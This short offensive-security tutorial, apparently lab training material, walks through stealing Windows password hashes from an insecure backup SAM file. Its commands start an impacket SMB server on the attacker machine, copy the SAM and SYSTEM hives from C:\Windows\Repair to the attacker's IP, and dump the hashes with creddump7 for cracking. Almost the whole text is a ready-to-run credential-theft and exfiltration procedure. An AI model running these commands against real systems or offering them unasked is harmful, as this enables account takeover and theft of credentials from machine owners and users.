In this section we will learn how to exploit insecure SAM file.

Now, Let’s start.

cd c:\\windows\\repair

Please notice that we found the SAM and System files.

Now, let’s transfer the files to the attacker machine.

1. Open SMBServer on our machine.

impacket-smbserver rem01x `pwd`

2. on the victim machine.

copy C:\\Windows\\Repair\\SAM \\\\10.8.44.22\\rem01x\\
copy C:\\Windows\\Repair\\SYSTEM \\\\10.8.44.22\\rem01x\\

Now, Let’s go to our attacker machine.

Now, we have the files.

 python3 creddump7/pwdump.py SYSTEM SAM

Now, Let’s crack the hash.